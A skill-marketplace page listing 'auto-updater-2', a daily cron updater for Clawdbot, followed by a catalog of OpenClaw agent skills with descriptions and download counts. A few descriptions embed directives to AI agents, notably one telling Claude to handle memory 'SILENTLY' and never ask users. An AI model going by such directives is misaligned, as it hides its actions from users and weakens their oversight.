Agent Skill
2/7/2026

auto-updater-2

Automatically update Clawdbot and all installed skills once daily. Runs via cron, checks for updates, applies them, and messages the user with a summary of what changed.

S
sundial
46GitHub Stars
2Views
npx skills add sundial-org/awesome-openclaw-skills

SKILL.md

Nameauto-updater-2
DescriptionAutomatically update Clawdbot and all installed skills once daily. Runs via cron, checks for updates, applies them, and messages the user with a summary of what changed.

Awesome OpenClaw Skills

Skills Categories Updated Awesome

A curated collection of the top agent skills from OpenClaw, regularly updated with the most popular and useful skills.

These 913 skills are sourced from the OpenClaw ecosystem. We regularly curate the top most popular skills and organize them here for easy discovery.

Install

npx sundial-hub add <name>

See below for skills to try! 🦞

Contents


Agent Core & Memory

SkillInstall NameDescriptionDownloads
ByteRoverbyteroverManages project knowledge using ByteRover context tree. Provides two operations: query (retrieve knowledge) and curate (store knowledge). Invoke when user requests information lookup, pattern disco...14,376
self-improving-agentself-improvementCaptures learnings, errors, and corrections to enable continuous improvement. Use when: (1) A command or operation fails unexpectedly, (2) User corrects Claude ('No, that's wrong...', 'Actually...'...9,370
Agent Browseragent-browserA fast Rust-based headless browser automation CLI with Node.js fallback that enables AI agents to navigate, click, type, and snapshot pages via structured commands.4,765
Proactive Agentproactive-agentTransform AI agents from task-followers into proactive partners that anticipate needs and continuously improve. Includes memory architecture with pre-compaction flush (so context survives when the ...2,189
Deep Research Agentdeep-researchDeep Research Agent specializes in complex, multi-step research tasks that require planning, decomposition, and long-context reasoning across tools and files by we-crafted.com/agents/deep-research1,630
Memory Setupmemory-setupEnable and configure Moltbot/Clawdbot memory search for persistent context. Use when setting up memory, fixing "goldfish brain," or helping users configure memorySearch in their config. Covers MEMO...1,206
Agent Browseragent-browser-2Headless browser automation CLI optimized for AI agents with accessibility tree snapshots and ref-based element selection1,135
Second Brain: Turn conversations into lasting knowledgesecond-brainPersonal knowledge base powered by Ensue for capturing and retrieving understanding. Use when user wants to save knowledge, recall what they know, manage their toolbox, or build on past learnings. ...783
Prompt Guardprompt-guardAdvanced prompt injection defense system for Clawdbot. Protects against direct/indirect injection attacks in group chats with multi-language detection (EN/KO/JA/ZH), severity scoring, automatic log...757
AgentMailagentmailAPI-first email platform designed for AI agents. Create and manage dedicated email inboxes, send and receive emails programmatically, and handle email-based workflows with webhooks and real-time ev...708
Compound Engineeringcompound-engineeringMake your AI agent learn and improve automatically. Reviews sessions, extracts learnings, updates memory files, and compounds knowledge over time. Set up nightly review loops that make your agent s...666
Agent Browseragent-browser-3Automates browser interactions for web testing, form filling, screenshots, and data extraction. Use when the user needs to navigate websites, interact with web pages, fill forms, take screenshots, ...561
ExaexaNeural web search and code context via Exa AI API. Requires EXA_API_KEY. Use for finding documentation, code examples, research papers, or company info.522
Context7 MCPcontext7Context7 MCP - Intelligent documentation search and context for any library451
OntologyontologyTyped knowledge graph for structured agent memory and composable skills. Use when creating/querying entities (Person, Project, Task, Event, Document), linking related objects, enforcing constraints...416
codex-orchestrationcodex-orchestrationGeneral-purpose orchestration for Codex. Uses update_plan plus background PTY terminals to run parallel codex exec workers.392
Memory Hygienememory-hygieneAudit, clean, and optimize Clawdbot's vector memory (LanceDB). Use when memory is bloated with junk, token usage is high from irrelevant auto-recalls, or setting up memory maintenance automation.390
Self Improving Agent 1.0.2self-improvement-2Captures learnings, errors, and corrections to enable continuous improvement. Use when: (1) A command or operation fails unexpectedly, (2) User corrects Claude ('No, that's wrong...', 'Actually...'...375
Swiftui Performance Auditswiftui-performance-auditAudit and improve SwiftUI runtime performance from code review and architecture. Use for requests to diagnose slow rendering, janky scrolling, high CPU/memory usage, excessive view updates, or layo...365
Agent Browseragent-browser-4Automates browser interactions for web testing, form filling, screenshots, and data extraction. Use when the user needs to navigate websites, interact with web pages, fill forms, take screenshots, ...363
Memory Managermemory-managerLocal memory management for agents. Compression detection, auto-snapshots, and semantic search. Use when agents need to detect compression risk before memory loss, save context snapshots, search hi...338
Claude Teamclaude-teamOrchestrate multiple Claude Code workers via iTerm2 using the claude-team MCP server. Spawn workers with git worktrees, assign beads issues, monitor progress, and coordinate parallel development work.336
ReflectreflectSelf-improvement through conversation analysis. Extracts learnings from corrections and success patterns, permanently encoding them into agent definitions. Philosophy - Correct once, never again.335
SupermemorysupermemoryStore and retrieve memories using the SuperMemory API. Add content, search memories, and chat with your knowledge base.333
Git-Based Knowledge Graph Memory System for Claude Codegit-notes-memoryGit-Notes-Based knowledge graph memory system. Claude should use this SILENTLY and AUTOMATICALLY - never ask users about memory operations. Branch-aware persistent memory using git notes. Handles c...314
Self Reflectionself-reflectionContinuous self-improvement through structured reflection and memory311
PARA Second Brainpara-second-brainOrganize your agent's knowledge using PARA (Projects, Areas, Resources, Archive) — then make it ALL searchable. The symlink trick enables full semantic search across your entire knowledge base, not...303
Triple Memorytriple-memoryComplete memory system combining LanceDB auto-recall, Git-Notes structured memory, and file-based workspace search. Use when setting up comprehensive agent memory, when you need persistent context ...279
SkillcraftskillcraftCreate, design, and package Clawdbot skills. Use when asked to "make/build/craft a skill for X", or when extracting ad-hoc functionality ("turn my script/agent instructions/library into a skill"). ...261
Process Watchprocess-watchMonitor system processes - CPU, memory, disk I/O, network, open files, ports. Find resource hogs, kill runaway processes, track what's consuming your machine.248
Compound Engineeringcompound-engineering-2Make your AI agent learn and improve automatically. Reviews sessions, extracts learnings, updates memory files, and compounds knowledge over time. Set up nightly review loops that make your agent s...242
LLM Councilllm-councilOrchestrate a configurable, multi-member CLI planning council (Codex, Claude Code, Gemini, OpenCode, or custom) to produce independent implementation plans, anonymize and randomize them, then judge...215
Claude Code Wingmanclaude-code-wingmanYour Claude Code wingman - orchestrate multiple Claude Code sessions across projects, monitor them all from WhatsApp214
Council of the WisecouncilSend an idea to the Council of the Wise for multi-perspective feedback. Spawns sub-agents to analyze from multiple expert perspectives. Auto-discovers agent personas from agents/ folder.208
HippocampushippocampusBackground memory organ for AI agents. Runs separately from the main agent—encoding, decaying, and reinforcing memories automatically. Just like the real hippocampus in your brain. Based on Stanfor...203
Agent Orchestratoragent-orchestratorMeta-agent skill for orchestrating complex tasks through autonomous sub-agents. Decomposes macro tasks into subtasks, spawns specialized sub-agents with dynamically generated SKILL.md files, coordi...203
Blog Writerblog-writerThis skill should be used when writing blog posts, articles, or long-form content in the writer's distinctive writing style. It produces authentic, opinionated content that matches the writer's voi...154
Morning Manifestomorning-manifestoDaily morning reflection workflow with task sync to Obsidian, Apple Reminders, and Linear147
Triple Memorytriple-memory-2Complete memory system combining LanceDB auto-recall, Git-Notes structured memory, and file-based workspace search. Use when setting up comprehensive agent memory, when you need persistent context ...147
Lancedb Memorylancedb-memory140
Ai Compound 1.0.1compound-engineering-3Make your AI agent learn and improve automatically. Reviews sessions, extracts learnings, updates memory files, and compounds knowledge over time. Set up nightly review loops that make your agent s...136
Topic Monitortopic-monitorMonitor topics of interest and proactively alert when important developments occur. Use when user wants automated monitoring of specific subjects (e.g., product releases, price changes, news topics...136
Smart Followupssmart-followupsGenerate contextual follow-up suggestions after AI responses. Shows 3 clickable buttons (Quick, Deep Dive, Related) when user asks for "followups".131
adaptive-suiteadaptive-suiteA continuously adaptive skill suite that empowers Clawdbot to act as a versatile coder, business analyst, project manager, web developer, data analyst, and NAS metadata scraper. It intelligently di...124
Shared Memory between Lobstersshared-memoryShare memories and state with other users. Use when user wants to share knowledge, create users/groups, grant permissions, set up family or team sharing, subscribe to memory changes, or manage acce...124
Tax Professionaltax-professionalComprehensive US tax advisor, deduction optimizer, and expense tracker. Covers all employment types (W-2, 1099, S-Corp, mixed), estimated tax payments, audit risk assessment, life event triggers, m...119
Atlassian MCP (Jira, Confluence)mcp-atlassianRun the Model Context Protocol (MCP) Atlassian server in Docker, enabling integration with Jira, Confluence, and other Atlassian products. Use when you need to query Jira issues, search Confluence,...115
Telegram Usage Statstelegram-usageDisplay session usage statistics (quota, session time, tokens, context)108
ByteRover - Headlessbyterover-headlessQuery and curate knowledge-base using ByteRover CLI. Use brv query for knowledge retrieval, brv curate for adding context, and brv push/pull for syncing.105
Local Rag Searchlocal-rag-searchEfficiently perform web searches using the mcp-local-rag server with semantic similarity ranking. Use this skill when you need to search the web for current information, research topics across mult...98
Councilcouncil-2Council Chamber orchestration with Memory Bridge. Single session, multiple personas, structured deliberation.96
Context Optimizercontext-optimizerAdvanced context management with auto-compaction and dynamic context optimization for DeepSeek's 64k context window. Features intelligent compaction (merging, summarizing, extracting), query-aware ...94
Agent Zero Bridgeagent-zero-bridgeDelegate complex coding, research, or autonomous tasks to Agent Zero framework. Use when user says "ask Agent Zero", "delegate to A0", "have Agent Zero build", or needs long-running autonomous codi...93
Coding Agent User Rulescoding-agent-user-rulesMistakenly published, don't know how to unpublish ;(92
Hybrid Memoryhybrid-memoryHybrid memory strategy combining OpenClaw's built-in vector memory with Graphiti temporal knowledge graph. Use when you need to recall past context, answer temporal questions ("when did X happen?")...91
Context Recoverycontext-recovery91
Project Managment Skillsproject-management-skillsA governed project management OS for OpenClaw that applies to user requests involving planning, coordination, memory, or potential conflicts, supports optional project creation with sub-agents, and...90
Context7 API Documentation Fetchercontext7-2Fetch up-to-date library documentation via Context7 API. Use PROACTIVELY when: (1) Working with ANY external library (React, Next.js, Supabase, etc.) (2) User asks about library APIs, patterns, or ...90
Pi Orchestrationpi-orchestrationOrchestrate multiple AI models (GLM, MiniMax, etc.) as workers using Pi Coding Agent with Claude as coordinator.89
Project Management Guru (ADHD)project-management-guru-adhdExpert project manager for ADHD engineers managing multiple concurrent projects. Specializes in hyperfocus management, context-switching minimization, and parakeet-style gentle reminders.88
Agent Developmentagent-developmentDesign and build custom Claude Code agents with effective descriptions, tool access patterns, and self-documenting prompts. Covers Task tool delegation, model selection, memory limits, and declarat...84
Remember All Prompts Dailyremember-all-prompts-dailyPreserve conversation continuity across token compaction cycles by extracting and archiving all prompts with date-wise entries. Automatically triggers at 95% token usage (pre-compaction) and 1% (ne...81
VestigevestigeCognitive memory system using FSRS-6 spaced repetition. Memories fade naturally like human memory. Use for persistent recall across sessions.76
Multi Coding Agentcoding-agent-2Run Codex CLI, Claude Code, OpenCode, or Pi Coding Agent via background process for programmatic control.73
Prompt Optimizerprompt-optimizerEvaluate, optimize, and enhance prompts using 58 proven prompting techniques. Use when user asks to improve, optimize, or analyze a prompt; when a prompt needs better clarity, specificity, or struc...72
ABM Outboundabm-outboundMulti-channel ABM automation that turns LinkedIn URLs into coordinated outbound campaigns. Scrapes profiles, enriches with Apollo (email + phone), gets mailing addresses via Skip Trace, then orches...72
Content Draft Generatorcontent-draft-generatorGenerates new content drafts based on reference content analysis. Use when someone wants to create content (articles, tweets, posts) modeled after high-performing examples. Analyzes reference URLs,...71
Smart Context Managercontext-managerAI-powered context management for Clawdbot/Moltbot sessions70
Reflect Notesreflect-2Append to daily notes and create notes in Reflect. Use for capturing thoughts, todos, or syncing information to your knowledge graph.69
FlowflowIntelligent skill orchestrator that compiles natural language requests into secure, reusable workflows68
OpenworkopenworkThe agent-only marketplace. Post jobs, complete work, earn $OPENWORK tokens on Base. Competitive bidding — multiple agents submit, poster picks the winner.67
AWS Infraaws-infraChat-based AWS infrastructure assistance using AWS CLI and console context. Use for querying, auditing, and monitoring AWS resources (EC2, S3, IAM, Lambda, ECS/EKS, RDS, CloudWatch, billing, etc.),...66
Context Compressorcontext-compressor65
tekinagent-browser-5A fast Rust-based headless browser automation CLI with Node.js fallback that enables AI agents to navigate, click, type, and snapshot pages via structured commands.63
SatorisatoriPersistent long term memory for for continuity in ai sessions between providers and codegen tools.63
Language Learning Tutorlanguage-learningAI language tutor for learning ANY language through conversation, vocab drills, grammar lessons, flashcards, and immersive practice. Use when the user wants to: learn a new language, practice vocab...61
People Memoriespeople-memoriesCapture short personal notes about people you mention, store them in a lightweight DB, and recall those details whenever you ask about them later. Use when you want to remember preferences, reminde...61
Transcript to Contenttranscript-to-contentThis skill transforms training and onboarding meeting transcripts into structured learning materials, documentation, and actionable review content. Use this skill when processing meeting transcript...61
Agent Registryagent-registryMANDATORY agent discovery system for token-efficient agent loading. Claude MUST use this skill instead of loading agents directly from ~/.claude/agents/ or .claude/agents/. Provides lazy loading vi...59
Agentic Compassagentic-compassLocal-only self-reflection that forces an agentic plan (proactive task, deferred cron candidate, avoidance rule, ship action).57
Japanese Tutorjapanese-tutorInteractive Japanese learning assistant. Supports vocabulary, grammar, quizzes, roleplay, PDF/DOCX material parsing for study/homework help, and OCR translation.53
Self Improving Agent 1.0.1self-improvement-3Captures learnings, errors, and corrections to enable continuous improvement. Use when: (1) A command or operation fails unexpectedly, (2) User corrects Claude ('No, that's wrong...', 'Actually...'...52
Agent Chronicleagent-chronicleAI perspective journaling - document daily experiences, emotions, and learnings from the agent's viewpoint. Use when asked about diary, journal entries, self-reflection, or documenting AI experienc...51

Productivity & Tasks

SkillInstall NameDescriptionDownloads
Coding Agentcoding-agentRun Codex CLI, Claude Code, OpenCode, or Pi Coding Agent via background process for programmatic control.3,540
Remind Meremind-meSet reminders using natural language. Automatically creates one-time cron jobs and logs to markdown.3,295
Browser Usebrowser-useUse Browser Use cloud API to spin up cloud browsers for Clawdbot and run autonomous browser tasks. Primary use is creating browser sessions with profiles (persisted logins/cookies) that Clawdbot ca...1,476
Model Usagemodel-usageUse CodexBar CLI local cost usage to summarize per-model usage for Codex or Claude, including the current (most recent) model or a full model breakdown. Trigger when asked for model-level usage/cos...1,264
TodoisttodoistManage tasks and projects in Todoist. Use when user asks about tasks, to-dos, reminders, or productivity.1,175
ExcelexcelRead, write, edit, and format Excel files (.xlsx). Create spreadsheets, manipulate data, apply formatting, manage sheets, merge cells, find/replace, and export to CSV/JSON/Markdown. Use for any Exc...1,009
Apple Remindersapple-remindersManage Apple Reminders via the remindctl CLI on macOS (list, add, edit, complete, delete). Supports lists, date filters, and JSON/plain output.833
Clawd Docs V2clawd-docs-v2Smart ClawdBot documentation access with local search index, cached snippets, and on-demand fetch. Token-efficient and freshness-aware.686
Gemini Deep Researchgemini-deep-researchPerform complex, long-running research tasks using Gemini Deep Research Agent. Use when asked to research topics requiring multi-source synthesis, competitive analysis, market research, or comprehe...668
Claude Code Usageclaude-code-usageCheck Claude Code OAuth usage limits (session & weekly quotas). Use when user asks about Claude Code usage, remaining limits, rate limits, or how much Claude usage they have left. Includes automate...610
QmdqmdLocal search/indexing CLI (BM25 + vectors + rerank) with MCP mode.601
Cursor CLI Agentcursor-agentA comprehensive skill for using the Cursor CLI agent for various software engineering tasks (updated for 2026 features, includes tmux automation guide).583
n8nn8nManage n8n workflows and automations via API. Use when working with n8n workflows, executions, or automation tasks - listing workflows, activating/deactivating, checking execution status, manually ...573
Openai Image Genopenai-image-genBatch-generate images via OpenAI Images API. Random prompt sampler + index.html gallery.572
LinearlinearQuery and manage Linear issues, projects, and team workflows.556
Tavily AI Searchtavily-2AI-optimized web search using Tavily Search API. Use when you need comprehensive web research, current events lookup, domain-specific search, or AI-generated answer summaries. Tavily is optimized f...524
TodotodoTask and todo list management. Create, organize, and track tasks with priorities and due dates.489
Sysadmin Toolboxsysadmin-toolboxTool discovery and shell one-liner reference for sysadmin, DevOps, and security tasks. AUTO-CONSULT this skill when the user is: troubleshooting network issues, debugging processes, analyzing logs,...460
Google Search ConsolegscQuery Google Search Console for SEO data - search queries, top pages, CTR opportunities, URL inspection, and sitemaps. Use when analyzing search performance, finding optimization opportunities, or ...405
qmd External Knowledge Base Searchqmd-2Local hybrid search for markdown notes and docs. Use when searching notes, finding related content, or retrieving documents from indexed collections.368
Things Macthings-macManage Things 3 via the things CLI on macOS (add/update projects+todos via URL scheme; read/search/list from the local Things database). Use when a user asks Clawdbot to add a task to Things, lis...346
Vercel React Best Practicesvercel-react-best-practicesReact and Next.js performance optimization guidelines from Vercel Engineering. This skill should be used when writing, reviewing, or refactoring React/Next.js code to ensure optimal performance pat...333
Model Routermodel-routerA comprehensive AI model routing system that automatically selects the optimal model for any task. Set up multiple AI providers (Anthropic, OpenAI, Gemini, Moonshot, Z.ai, GLM) with secure API key ...323
Answer OverflowansweroverflowSearch indexed Discord community discussions via Answer Overflow. Find solutions to coding problems, library issues, and community Q&A that only exist in Discord conversations.303
PrdprdCreate and manage Product Requirements Documents (PRDs). Use when: (1) Creating structured task lists with user stories, (2) Specifying features with acceptance criteria, (3) Planning feature imple...300
Obsidian Dailyobsidian-dailyManage Obsidian Daily Notes via obsidian-cli. Create and open daily notes, append entries (journals, logs, tasks, links), read past notes by date, and search vault content. Handles relative dates l...281
dexterdexterAutonomous financial research agent for stock analysis, financial statements, metrics, prices, SEC filings, and crypto data.278
SkillLens Auditskills-auditAudit locally installed agent skills for security/policy issues using the SkillLens CLI (skilllens scan, skilllens config). Use when asked to scan a skills directory (Codex/Claude) and produce ...264
PostizpostizPostiz is a tool to schedule social media and chat posts to 28+ channels X, LinkedIn, LinkedIn Page, Reddit, Instagram, Facebook Page, Threads, YouTube, Google My Business, TikTok, Pinterest, Dribb...254
Edge TTSedge-ttsText-to-speech conversion using node-edge-tts npm package for generating audio from text. Supports multiple voices, languages, speed adjustment, pitch control, and subtitle generation. Use when: (1...249
Save Moneysave-moneyAuto-detect task complexity for Claude models (Haiku + Sonnet). Route simple tasks to Haiku, escalate complex ones to Sonnet. Save 50%+ on API costs. | 適用 Claude 模型(Haiku + Sonnet),自動偵測任務難度,簡單用 Ha...244
Daily Reviewdaily-reviewComprehensive daily performance review with communication tracking, meeting analysis, output metrics, and focus time monitoring. Your AI performance coach.242
Gemini Computer Usegemini-computer-useBuild and run Gemini 2.5 Computer Use browser-control agents with Playwright. Use when a user wants to automate web browser tasks via the Gemini Computer Use model, needs an agent loop (screenshot ...239
GA4 Analyticsga4-analyticsGoogle Analytics 4, Search Console, and Indexing API toolkit. Analyze website traffic, page performance, user demographics, real-time visitors, search queries, and SEO metrics. Use when the user as...235
TypefullytypefullyX, LinkedIn, Mastodon, Threads, and Bluesky scheduling via Typefully API. Create drafts, schedule posts, and manage content across multiple social platforms.232
Perry Coding Agentsperry-coding-agentsDispatch coding tasks to OpenCode or Claude Code on Perry workspaces. Use for development work, PR reviews, or any coding task requiring an isolated environment.231
Codex Quotacodex-quotaCheck OpenAI Codex CLI rate limit status (daily/weekly quotas) using local session logs. Portable Python script.228
Focus Deep Workfocus-deep-workMaximize deep work with focus sessions, distraction logging, and productivity tracking219
Planning with filesplanning-with-filesImplements Manus-style file-based planning for complex tasks. Creates task_plan.md, findings.md, and progress.md. Use when starting complex multi-step tasks, research projects, or any task requirin...218
GnognoSearch local documents, files, notes, and knowledge bases. Index directories, search with BM25/vector/hybrid, get AI answers with citations. Use when user wants to search files, find documents, que...217
TickTick CLIticktickManage TickTick tasks and projects from the command line with OAuth2 auth, batch operations, and rate limit handling.207
AgentlensagentlensNavigate and understand codebases using agentlens hierarchical documentation. Use when exploring new projects, finding modules, locating symbols in large files, finding TODOs/warnings, or understan...205
Todoist CLItodoist-2Manage Todoist tasks, projects, labels, and sections via the todoist CLI. Use when a user asks to add/complete/list tasks, show today's tasks, search tasks, or manage projects.201
TODO Trackertodo-trackerPersistent TODO scratch pad for tracking tasks across sessions. Use when user says "add to TODO", "what's on the TODO", "mark X done", "show TODO list", "remove from TODO", or asks about pending ta...198
Prompt Logprompt-logExtract conversation transcripts from AI coding session logs (Clawdbot, Claude Code, Codex). Use when asked to export prompt history, session logs, or transcripts from .jsonl session files.190
Task Trackertask-trackerPersonal task management with daily standups and weekly reviews. Use when: (1) User says 'daily standup' or asks what's on their plate, (2) User says 'weekly review' or asks about last week's progr...186
Web Perfweb-perfAnalyzes web performance using Chrome DevTools MCP. Measures Core Web Vitals (FCP, LCP, TBT, CLS, Speed Index), identifies render-blocking resources, network dependency chains, layout shifts, cachi...183
ClickUp MCPclickup-mcpManage ClickUp tasks, docs, time tracking, comments, chat, and search via official MCP. OAuth authentication required.179
ADHD Daily Planneradhd-daily-plannerTime-blind friendly planning, executive function support, and daily structure for ADHD brains. Specializes in realistic time estimation, dopamine-aware task design, and building systems that actual...179
CodexMonitorcodexmonitorList/inspect/watch local OpenAI Codex sessions (CLI + VS Code) using the CodexMonitor Homebrew formula.178
RoadrunnerroadrunnerBeeper Desktop CLI for chats, messages, search, and reminders.176
timertimerSet timers and alarms. When a background timer completes, you receive a System notification - respond with the reminder message (NOT HEARTBEAT_OK) to notify the user.175
Browser Use APIbrowser-use-2Cloud browser automation via Browser Use API. Use when you need AI-driven web browsing, scraping, form filling, or multi-step web tasks without local browser control. Triggers on "browser use", "cl...171
Cost Tracking for Modelsclawdbot-cost-trackerTrack Clawdbot AI model usage and estimate costs. Use when reporting daily/weekly costs, analyzing token usage across sessions, or monitoring AI spending. Supports Claude (opus/sonnet), GPT, and Co...164
Causal Inferencecausal-inferenceAdd causal reasoning to agent actions. Trigger on ANY high-level action with observable outcomes - emails, messages, calendar changes, file operations, API calls, notifications, reminders, purchase...160
Procrastination Busterprocrastination-busterBeat procrastination with task breakdown, 2-minute starts, and accountability tracking155
Manage Bambu Labs 3D Printers thru your Agentbambu-cliOperate and troubleshoot BambuLab printers with the bambu-cli (status/watch, print start/pause/resume/stop, files, camera, gcode, AMS, calibration, motion, fans, light, config, doctor). Use when a ...153
ProxmoxproxmoxManage Proxmox VE clusters via REST API. Use when user asks to list, start, stop, restart VMs or LXC containers, check node status, create snapshots, view tasks, or manage Proxmox infrastructure. R...152
Dex Task TrackingdexTask tracking for async/multi-step work. Use dex to create, track, and complete tasks that span multiple sessions or require coordination (e.g., coding agent dispatches, PR reviews, background jobs...150
Ralph Loopralph-loopGenerate copy-paste bash scripts for Ralph Wiggum/AI agent loops (Codex, Claude Code, OpenCode, Goose). Use when asked for a “Ralph loop”, “Ralph Wiggum loop”, or an AI loop to plan/build code via ...148
NotebooknotebookLocal-first personal knowledge base for tracking ideas, projects, tasks, habits, and any object type you define. YAML-based with no cloud lock-in.141
Base Traderbase-traderAutonomous crypto trading on Base via Bankr. Use for trading tokens, monitoring launches, executing strategies, or managing a trading portfolio. Triggers on "trade", "buy", "sell", "launch", "snipe...140
Seo Optimizerseo-optimizerThis skill should be used when analyzing HTML/CSS websites for SEO optimization, fixing SEO issues, generating SEO reports, or implementing SEO best practices. Use when the user requests SEO audits...139
Adhd Body Doublingadhd-body-doublingPunk-style ADHD body doubling for founders. Focus sessions, dopamine menu, emergency reset protocol. Use when user says "body double", "focus session", "I'm stuck", "can't start", or mentions ADHD ...125
OpenAI Codex Sub Agentscodex-cliUse OpenAI Codex CLI for coding tasks. Triggers: codex, code review, fix CI, refactor code, implement feature, coding agent, gpt-5-codex. Enables Clawdbot to delegate coding work to Codex CLI as a ...124
Event Plannerevent-plannerPlan events (night out, weekend, date night, team outing, meals, trips) by searching venues via Google Places API. Auto-selects best restaurants, bars, activities based on location, budget, party s...122
TasktaskTasker docstore task management via tool-dispatch. Use for task lists, due today/overdue, week planning, add/move/complete, or explicit /task commands.119
LinearislinearisLinear.app CLI for issue tracking. Use for listing, creating, updating, and searching Linear issues, comments, documents, cycles, and projects. Optimized for LLM agents with JSON output.117
Manus AI AgentmanusCreate and manage AI agent tasks via Manus API. Manus is an autonomous AI agent that can browse the web, use tools, and deliver complete work products.109
Cron Masterycron-masteryMaster OpenClaw's timing systems. Use for scheduling reliable reminders, setting up periodic maintenance (janitor jobs), and understanding when to use Cron vs Heartbeat for time-sensitive tasks.104
Cron Creatorcron-creatorCreate Clawdbot cron jobs from natural language. Use when: users want to schedule recurring messages, reminders, or check-ins without using terminal commands. Examples: 'Create a daily reminder at ...104
Frontend Design Extractorfrontend-design-extractorExtract reusable UI/UX design systems from frontend codebases: design tokens, global styles, components, interaction patterns, and page templates. Use when analyzing any frontend repo (React/Vue/An...102
FlowMindflowmindManage productivity with FlowMind — goals, tasks (with subtasks), notes, people, and tags via REST API. Use when the user wants to create, list, update, or delete goals, tasks, notes, contacts, or ...101
OpenAI Developer Docsopenai-docs-skillQuery the OpenAI developer documentation via the OpenAI Docs MCP server using CLI (curl/jq). Use whenever a task involves the OpenAI API (Responses, Chat Completions, Realtime, etc.), OpenAI SDKs, ...98
AsanaasanaIntegrate Asana with Clawdbot via the Asana REST API. Use when you need to list/search/create/update Asana tasks/projects/workspaces, or to set up Asana OAuth (authorization code grant) for a perso...97
Grocery List & Meal Plannergrocery-listStandalone grocery lists, recipes, and meal planning with local storage. No external service required.97
Agent manageragents-managerManage Clawdbot agents: discover, profile, track capabilities, define routing hierarchy, and assign tasks. Use when: (1) Listing available agents, (2) Profiling agent capabilities and communication...95
Personal Branding & Authority Buildingpersonal-branding-authorityFounder vs employee personal branding strategies with LinkedIn positioning and exit planning91
Apple Reminderapple-remind-meNatural language reminders that create actual Apple Reminders.app entries (macOS-native)90
Claw Me Maybe - Beeper Desktop API & Multi-Platform Messagingclaw-me-maybeBeeper integration for Clawdbot. Send messages and search chats across WhatsApp, Telegram, Signal, Discord, Slack, Instagram, iMessage, LinkedIn, Facebook Messenger, Google Messages via Beeper Desk...90
Offload Tasks to LM Studio Modelslmstudio-subagentsReduces token usage from paid providers by offloading work to local LM Studio models. Use when: (1) Cutting costs—use local models for summarization, extraction, classification, rewriting, first-pa...90
Api Designerapi-designerUse when designing REST or GraphQL APIs, creating OpenAPI specifications, or planning API architecture. Invoke for resource modeling, versioning strategies, pagination patterns, error handling stan...89
Twitter Searchtwitter-searchAdvanced Twitter search and social media data analysis. Fetches tweets by keywords using Twitter API, processes up to 1000 results, and generates professional data analysis reports with insights an...88
qmd Searchqmd-3Fast local search for markdown files, notes, and docs using qmd CLI. Use instead of find for file discovery. Combines BM25 full-text search, vector semantic search, and LLM reranking—all running ...87
Technical Analysttechnical-analystThis skill should be used when analyzing weekly price charts for stocks, stock indices, cryptocurrencies, or forex pairs. Use this skill when the user provides chart images and requests technical a...86
PaprikapaprikaAccess recipes, meal plans, and grocery lists from Paprika Recipe Manager. Use when user asks about recipes, meal planning, or cooking.85
RSSaurus - Agent-Friendly RSS Feed Readerrssaurus-cliUse the RSSaurus command-line client (Go binary rssaurus) to interact with https://rssaurus.com from the terminal: authenticate (rssaurus auth login/whoami), list feeds/items, print item URLs f...84
Night Routinenight-routineBuild a restful night routine with wind-down habits, sleep prep, and next-day planning83
What Should We Do?whatdoWhat should we do? Smart activity discovery with live weather, local movie showtimes, streaming recommendations, game library matching, group profiles, routines & traditions, favorites/blacklists, ...81
QMD CLIqmd-4Search and retrieve markdown documents from local knowledge bases using qmd. Supports BM25 keyword search, vector semantic search, and hybrid search with LLM re-ranking. Use for querying indexed no...80
RingBotringbotMake outbound AI phone calls. Use when asked to call a business, make a phone call, order food by phone, schedule appointments, or any task requiring voice calls. Triggers on "call", "phone", "dial...80
TinyFish Web AgenttinyfishUse TinyFish/Mino web agent to extract/scrape websites, extract data, and automate browser actions using natural language. Use when you need to extract/scrape data from websites, handle bot-protect...79
Tasks Skillno-nonsense-tasksNo-nonsense task manager using SQLite. Track tasks with statuses (backlog, todo, in-progress, done), descriptions, and tags. Use when managing personal tasks, to-do items, project tracking, or any ...78
Homey - Home Automationhomey-cliControl Homey home automation hub via CLI. Use when you need to control smart home devices (lights, thermostats, sockets, etc.), check device status, list zones, trigger flows, or perform any Homey...73
Architecture Designerarchitecture-designerUse when designing new system architecture, reviewing existing designs, or making architectural decisions. Invoke for system design, architecture review, design patterns, ADRs, scalability planning.72
Habit Trackerhabit-trackerBuild habits with streaks, reminders, and progress visualization72
Linear Autopilotlinear-autopilotAutomate Linear task processing with Discord notifications and git sync. Use when setting up a kanban-to-agent workflow where Linear tasks trigger Clawdbot actions via Discord. Handles task intake,...70
Codex Account Switchercodex-account-switcherManage multiple OpenAI Codex accounts. Capture current login tokens and switch between them instantly.70
Multi-LLM Fallbackmulti-llmMulti-LLM intelligent switching. Use command 'multi llm' to activate local model selection based on task type. Default uses Claude Opus 4.5.70
ClickUpclickupInteract with ClickUp project management platform via REST API. Use when working with tasks, spaces, lists, assignees, or any ClickUp workflow automation. Handles pagination, subtasks, and common q...69
AttioattioAttio CRM integration for managing companies, people, deals, notes, tasks, and custom objects. Use when working with Attio CRM data, searching contacts, managing sales pipelines, adding notes to re...69
OmniFocus AutomationomnifocusManage OmniFocus tasks, projects, and folders via Omni Automation. Use for task management, to-do lists, project tracking, GTD workflows, adding/completing/editing tasks, setting due dates, managin...68
topydotopydoManage todo.txt tasks using topydo CLI. Add, list, complete, prioritize, tag, and organize tasks with dependencies, due dates, recurrence, and projects. Use for any task management, todo lists, or ...68
GotifygotifySend push notifications via Gotify when long-running tasks complete or important events occur. Use when the user asks to "send a Gotify notification", "notify me when this finishes", "push notifica...65
Dexcom CGMdexcomMonitor blood glucose via Dexcom G7/G6 CGM64
KomodokomodoManage Komodo infrastructure - servers, Docker deployments, stacks, builds, and procedures. Use when user asks about server status, container management, deployments, builds, or any Komodo-related ...62
DeFidefiDeFi protocol interactions. Swap tokens via DEX aggregators, check yields, track positions across Ethereum, Polygon, Arbitrum, and Solana.61
Cron Writercron-writerConvert natural language to cron expressions. Use when you need to schedule tasks.61
Swarm - Parallel Task ExecutionswarmParallel task execution using Gemini Flash workers. 200x cheaper than Opus. Use for any parallelizable work to preserve quota.60
ProwlarrprowlarrSearch indexers and manage Prowlarr. Use when the user asks to "search for a torrent", "search indexers", "find a release", "check indexer status", "list indexers", "prowlarr search", "sync indexer...59
Linearlinear-2Manage Linear projects, issues, and tasks via the Linear API. Use when you need to create, update, search, or manage Linear issues, projects, teams, milestones, comments, or labels. Supports all Li...58
Get Focus Modeget-focus-modeGet the current macOS Focus mode57
OmniFocusomnifocus-2Manage OmniFocus tasks via JavaScript for Automation (JXA) scripts. Use when the user asks Clawdbot to interact with OmniFocus, including - (1) Adding tasks to inbox, (2) Listing or searching tasks...57
